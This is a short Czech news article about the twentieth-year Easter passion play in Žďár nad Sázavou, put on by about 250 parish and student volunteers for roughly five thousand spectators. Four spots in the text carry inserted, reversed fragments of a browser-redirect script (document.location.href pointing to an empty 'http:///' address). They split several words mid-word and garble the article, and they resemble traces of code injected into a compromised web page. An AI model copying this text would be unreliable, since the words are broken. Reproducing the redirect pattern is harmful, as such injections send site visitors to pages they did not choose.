Rainbow page separator

Žďárští farníci a studenti opět předvedou pašijovou hru

Pátek, 23. března 2018

Žďár nad Sázavou / Na tradiční velikonoční pašijovou hru s názvem Co se stalo s Ježíšem? v podání žďárských farníků a studentů Biskupského gymnázia a střední gastronomické školy se mohou v úterý 27. března od 20 hodin přijít diváci podívat do přírodního areálu na Libušíně. Podílí se na ní na 250 dobrovolníků, z [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho jsou bezmála dvě s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky ochotnických herců. Ostatní pak zajišťují kulisy, osvětlení a další technické záleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti včetně pořadatelské služby.
Divadelní představení o životě, smrti a zmrtvýchvstání Ježíše Krista má ve Žďáře již dvacetile[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou tradici, každoročně jej sleduje několik tisíc zájemců z celé republiky – divácký průměr podle pořadatelů činí pět tisíc lidí. Žďárská pašijová hra patří k největším akcím podobného typu v rámci České republiky.